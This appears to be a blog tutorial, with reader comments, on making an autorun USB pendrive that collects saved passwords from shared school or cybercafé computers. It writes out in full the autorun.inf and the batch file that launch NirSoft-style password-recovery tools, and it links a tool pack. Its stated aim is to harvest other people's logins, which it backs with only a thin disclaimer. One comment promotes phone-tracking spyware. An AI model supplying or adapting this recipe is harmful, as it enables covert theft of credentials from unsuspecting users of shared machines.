Autorun pendrive keylogger tutorial

Here's my first computer-related tutorial which might be interesting for some, but most of you probably know this or heard about it.

Do you have access to your school's or local LAN house/cybercafé computers that are used by dozens of people? Imagine if you could gather all information (logins, historic, etc.) from them to your pendrive quickly? Well, that's easy and simple. You only need a few simple keyloggers and text files in your pendrive, which I'll explain below.

Tools

► Keylogger(s)

There are many keyloggers on the internet. A keylogger is a small app that gathers stuff such as passwords to yourself. In this tutorial I'll be using 5 simple ones, but you can use even others such as Ardamax Keylogger or Micro Keylogger.
  • MessenPass: gets passwords from MSN/Windows Messenger, Yahoo! Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger, Trillian, Miranda, GAIM, etc.
  • Mail PassView: gets passwords from Outlook Express, Microsoft Outlook 2000, Microsoft Outlook 2002/2003, IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail, etc. Mail PassView can also get passwords of web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
  • IE PassView: assuming the people that use the computers are noobs (only noobs use IE), this gets passwords from Internet Explorer, from version 4.0 to 7.0 (unsure about new ones).
  • Protected Storage PassView: gets all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
  • PasswordFox: gets passwords from Firefox.
You can download a pack with these tools without any viruses (tested myself, antivirus identified it as a HackTool - that's not a virus) by clicking here (courtesy of UnEtHacking).

Procedure

1. Download the pack (link above).
2. Extract all the .exe files to your pen-drive (don't simply put the ZIP folders there, you need to open them and copy the files inside to the pen).
3. Create a new text file called autorun.inf. Paste this in it:
[autorun]
open=launch.bat
ACTION= Autorun pen-drive.

(you can change the text in ACTION= to whatever you want)
Don't forget that the file must be .inf, NOT .txt!
4. Make another text file called launch.bat. Pate this in it:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
If you have more keyloggers, follow the same pattern
start KEYLOGGERNAME.exe /stext KEYLOGGERNAME.txt
Once again, don't forget the file must be .bat, NOT .txt!
5. Put all these files inside your pen-drive.

Make sure you have the following files in your pen-drive:
  • autorun.inf
  • launch.bat
  • mspass.exe
  • mailpv.exe
  • iepv.exe
  • iepv_sites.txt (you can add sites here for the program to try to catch passwords from)
  • pspv.exe
  • passwordfox.exe
  • Any other keylogger you might have added (obviously optional)

And there you have it! Now go put your pen-drive in other computers and double-click the launch.bat file you made (although you probably don't have to do this, because most computers will read the autorun.bat file, but still, you never know).
Then multiple text files will be made with all passwords the keyloggers catched in them!

As far as I know, this works in Windows 2000, XP, Vista and 7. Not sure about 8.

Note: this tutorial is not illegal, as it can be used for good causes such as getting passwords from your own PC after other people have been using it, for monitoring. It's the sole responsibility of the user that uses this method for illicit things.

How do it works? Does it after klicking on the .bat file open cmd and you're waiting for copying to pendrive or is it copying to a text file on the computer and you must copy this after the keylogging? How about ardamax? Ardamax is a keylogger that sends files to the FTP server and not to a text file on the device. I please for answer! Sorry for my bad english ;)

    2. Thanks for a useful information. I also recommend you to take a look at the following website to know more about TheTruthSpy, universal phone tracking software.
